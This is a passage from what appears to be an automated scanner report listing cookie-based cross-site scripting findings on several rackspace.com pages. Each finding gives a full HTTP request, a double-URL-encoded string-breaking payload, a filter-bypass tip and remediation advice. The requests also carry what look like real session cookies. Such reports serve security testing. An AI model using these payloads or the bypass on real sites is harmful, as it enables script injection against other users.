Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2011/02/stay_connected_in_the_snow HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8435c4%2527%253b58176ca46d5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c1ae%2527%253b92b61a2a14d was submitted in the IS_UASrackuid cookie. This input was echoed as 5c1ae';92b61a2a14d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/careers/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85c1ae%2527%253b92b61a2a14d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1c38%2527%253b969c1228a5 was submitted in the IS_UASrackuid cookie. This input was echoed as e1c38';969c1228a5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/contact_us HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e1c38%2527%253b969c1228a5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d28cd%2527%253bf981a7d0214 was submitted in the IS_UASrackuid cookie. This input was echoed as d28cd';f981a7d0214 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/contact_us/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d28cd%2527%253bf981a7d0214; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54a33%2527%253bb5a29e6008c was submitted in the IS_UASrackuid cookie. This input was echoed as 54a33';b5a29e6008c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/contact_us/email_sales/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f854a33%2527%253bb5a29e6008c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecd0%2527%253b50e5dee99ec was submitted in the IS_UASrackuid cookie. This input was echoed as 6ecd0';50e5dee99ec in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/control_panel/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86ecd0%2527%253b50e5dee99ec; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f765%2527%253b2a9ccb461b8 was submitted in the IS_UASrackuid cookie. This input was echoed as 9f765';2a9ccb461b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/customers HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89f765%2527%253b2a9ccb461b8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5722%2527%253bd5922c2264e was submitted in the IS_UASrackuid cookie. This input was echoed as c5722';d5922c2264e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/customers/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c5722%2527%253bd5922c2264e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b91a9%2527%253b1e14116bc6d was submitted in the IS_UASrackuid cookie. This input was echoed as b91a9';1e14116bc6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b91a9%2527%253b1e14116bc6d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfdb5%2527%253b93bf3f5231a was submitted in the IS_UASrackuid cookie. This input was echoed as dfdb5';93bf3f5231a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/compare HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dfdb5%2527%253b93bf3f5231a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f083%2527%253b14eea8ff837 was submitted in the IS_UASrackuid cookie. This input was echoed as 9f083';14eea8ff837 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/compare/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89f083%2527%253b14eea8ff837; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
